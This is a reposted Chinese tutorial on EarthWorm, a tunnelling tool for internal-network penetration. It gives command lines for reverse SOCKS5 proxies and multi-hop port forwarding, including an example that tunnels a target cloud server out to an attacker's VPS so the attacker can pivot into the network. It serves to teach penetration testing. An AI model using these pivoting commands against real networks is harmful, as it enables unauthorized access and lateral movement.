安基网 首页 安全 安全学院 查看内容

内网渗透入门到放弃之必备杀器—EarthWorm

2018-12-20 12:14| 投稿: xiaotiger |来自: 互联网


免责声明:本站系公益性非盈利IT技术普及网,本文由投稿者转载自互联网的公开文章,文末均已注明出处,其内容和图片版权归原网站或作者所有,文中所述不代表本站观点,若有无意侵权或转载不当之处请从网站右下角联系我们处理,谢谢合作!

摘要: 0x00 前言当你在内网渗透,并且拿下一台机器的权限时,你是不是觉得已经算是一次完整的渗透了?不来一次内网漫游,渗透是不完整的,哈哈。本文给大家推荐一款内网穿透神器EarthWorm,(简称EW)是一套轻量便携且功能强 ...

0x00 前言

当你在内网渗透,并且拿下一台机器的权限时,你是不是觉得已经算是一次完整的渗透了?

不来一次内网漫游,渗透是不完整的,哈哈。

本文给大家推荐一款内网穿透神器EarthWorm,(简称EW)是一套轻量便携且功能强大的网络穿透工具,基于标准C开发,具有socks5代理、端口转发和端口映射三大功能。

它强在哪些方面呢?

1.可穿透复杂的内网环境。(这么说吧:我本地连着路由器开一个虚拟机,可以直接反弹到公网的云服务器上。)

2.以支持多平台间的转接通讯,Linux、Windows、MacOS、Arm-Linux均支持。

支持平台列表:(可跨平台反弹)

ew_for_Win.exe 适用各种Windows系统(X86指令集、X64指令集) Windows7、Windows XPew_for_Linux32 各常见Linux发行版 (X86 指令集 CPU) Ubuntu(X86)/BT5(X86)ew_for_linux64 各常见Linux发行版 (X64 指令集 CPU) Ubuntu(X64)/Kali(X64)ew_for_MacOSX64 MacOS系统发行版 (X64 指令集) 苹果PC电脑,苹果serverew_for_Arm32 常见Arm-Linux系统 HTC New One(Arm-Android)/小米路由器(R1D)

ew_mipsel 常见Mips-Linux系统 (Mipsel指令集 CPU) 萤石硬盘录像机、小米mini路由器(R1CM)

0x01 使用方法

以下所有样例,如无特殊说明代理端口均为1080,服务均为SOCKSv5代理服务.

该工具共有 6 种命令格式(ssocksd、rcsocks、rssocks、lcx_slave、lcx_listen、lcx_tran)。

1.正向SOCKS v5服务器

$ ./ew -s ssocksd -l 1080

2. 反弹 SOCKS v5 服务器

这个操作具体分两步:

a) 先在一台具有公网 ip 的主机A上运行以下命令:

$ ./ew -s rcsocks -l 1080 -e 8888

b) 在目标主机B上启动 SOCKS v5 服务 并反弹到公网主机的 8888端口

$ ./ew -s rssocks -d 1.1.1.1 -e 8888

成功。

3. 多级级联

工具中自带的三条端口转发指令,它们的参数格式分别为:

 $ ./ew -s lcx_listen -l 1080 -e 8888
 $ ./ew -s lcx_tran -l 1080 -f 2.2.2.3 -g 9999
 $ ./ew -s lcx_slave -d 1.1.1.1 -e 8888 -f 2.2.2.3 -g 9999

通过这些端口转发指令可以将处于网络深层的基于TCP的服务转发至根前,比如 SOCKS v5。

首先提供两个“二级级联”本地SOCKS测试样例:

a) lcx_tran 的用法

$ ./ew -s ssocksd -l 9999
$ ./ew -s lcx_tran -l 1080 -f 127.0.0.1 -g 9999

b) lcx_listen、lcx_slave 的用法

$ ./ew -s lcx_listen -l 1080 -e 8888
$ ./ew -s ssocksd -l 9999
$ ./ew -s lcx_slave -d 127.0.0.1 -e 8888 -f 127.0.0.1 -g 9999

再提供一个“三级级联”的本地SOCKS测试用例以供参考

$ ./ew -s rcsocks -l 1080 -e 8888
$ ./ew -s lcx_slave -d 127.0.0.1 -e 8888 -f 127.0.0.1 -g 9999
$ ./ew -s lcx_listen -l 9999 -e 7777
$ ./ew -s rssocks -d 127.0.0.1 -e 7777

数据流向: SOCKS v5 -> 1080 -> 8888 -> 9999 -> 7777 -> rssocks

0x02 实战测试(分为本地测试和公网IP测试)

一般最常用的就是上面的第二条:反弹 SOCKS v5 服务器。

使用实例1:

目标机器:

ew.exe -s rssocks -d 2.2.2.2 -e 888

(2.2.2.2为想要反弹到的机器)

攻击机器:

ew.exe -s rcsocks -l 1008 -e 888

(监听888端口,转发到1008端口)

测试环境:

在这里我直接用我的本机Win10作为目标机器,将虚拟机Win7作为攻击机器。

本机Win10 ip:192.168.62.1

Win7 ip:192.168.62.128

首先攻击机器win7运行命令:

ew_for_Win.exe -s rcsocks -l 1008 -e 888

接收888端口的数据并转发到1008端口。

此时正在监听。

目标机器Win10运行命令:

ew_for_Win.exe -s rssocks -d 192.168.62.128 -e 888

此时攻击机器会弹出连接成功的提示:

好了,到此Win10的SOCKS5代理就反弹到Win7攻击机上了。

只需要一个Socks5连接工具就可以连接到本地1008端口来代理访问了。

推荐工具SocksCap64。

在代理处配置127.0.0.1:1008

代理已连接。

使用实例2:

攻击者洛杉矶 Linux VPS :45.78.*.*

目标阿里云服务器 Win2008:47.93.*.*

攻击者Linux监听:

[root@centos6 ~]# ./ew_for_Linux32 -s rcsocks -l 1008 -e 888

目标阿里云服务器反弹:

ew_for_Win.exe -s rssocks -d 45.78.*.* -e 888

攻击机器监听出现:rssocks cmd_socket OK!

表示反弹成功。

0x03 工具下载

分别是EarthWorm和SocksCap64。(私信我获取)

如果你也对网络安全感兴趣,或者致力于成为一名白帽子,或者仅仅想吃瓜看调戏黑阔和骗子的日常,也请关注我,不会让你们失望~



小编推荐:欲学习电脑技术、系统维护、网络管理、编程开发和安全攻防等高端IT技术,请 点击这里 注册账号,公开课频道价值万元IT培训教程免费学,让您少走弯路、事半功倍,好工作升职加薪!

本文出自:https://www.toutiao.com/i6621785592831148548/

免责声明:本站系公益性非盈利IT技术普及网,本文由投稿者转载自互联网的公开文章,文末均已注明出处,其内容和图片版权归原网站或作者所有,文中所述不代表本站观点,若有无意侵权或转载不当之处请从网站右下角联系我们处理,谢谢合作!


鲜花

握手
1

雷人

路过

鸡蛋

刚表态过的朋友 (1 人)

相关阅读

最新评论

 最新
返回顶部